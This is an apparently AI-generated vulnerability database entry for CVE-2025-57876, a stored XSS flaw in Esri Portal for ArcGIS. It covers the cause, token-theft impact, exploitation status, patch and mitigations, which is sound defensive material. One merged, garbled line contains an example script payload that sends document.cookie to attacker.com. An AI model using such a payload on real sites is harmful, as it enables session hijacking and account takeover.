
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-57876 is a stored Cross-Site Scripting (XSS) vulnerability in Esri Portal for ArcGIS versions 10.9.1 through 11.4 that allows a remote, authenticated attacker to inject a malicious file with an embedded XSS script. When a victim loads the compromised file, arbitrary JavaScript code may execute in their browser, potentially disclosing privileged authentication tokens and enabling full Portal takeover. The vulnerability was published on September 29, 2025, and carries a CVSS v3.1 base score of 4.8 (Medium), though the potential impact of token disclosure elevates its practical risk (Esri Advisory).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically a stored XSS variant (CAPEC-592). An authenticated attacker with high privileges can upload a malicious file containing embedded JavaScript to the Portal; when another user (such as an administrator) loads or previews that file, the script executes in their browser context without proper sanitization. Exploitation requires network access, high privileges, and victim interaction (user must load the malicious file), with no authentication bypass or complex chaining needed beyond the initial privileged account access (Esri Advisory).
Successful exploitation can result in the disclosure of privileged authentication tokens from the victim's browser session, which could allow the attacker to assume full administrative control of the Portal instance. While the CVSS scoring reflects low confidentiality and integrity impact in isolation, the real-world consequence of token theft — particularly from administrator accounts — represents a critical risk to the entire Portal environment, including all hosted geospatial data, user accounts, and connected services (Esri Advisory).
As of the time of reporting, there is no public proof-of-concept exploit code and no evidence of in-the-wild exploitation. The EPSS score is approximately 0.033%, indicating a low probability of near-term exploitation. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation is constrained by the requirement for a high-privilege authenticated account and victim interaction, limiting opportunistic attack scenarios (Esri Advisory).
<script>document.location='https://attacker.com/steal?c='+document.cookie;</script> or a script targeting Portal session tokens.<script> tags or JavaScript payloads in Portal content directories or shared item storage.Esri has released a patch addressing this vulnerability in the "Portal for ArcGIS Security 2025 Update 3" patch. Organizations running versions 10.9.1 through 11.4 (including all intermediate security updates) should apply this patch immediately. As interim mitigations, restrict file upload and content publishing privileges to the minimum necessary set of trusted users, implement a Content Security Policy (CSP) on the Portal to limit script execution, and monitor Portal activity logs for suspicious file uploads by high-privilege accounts (Esri Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."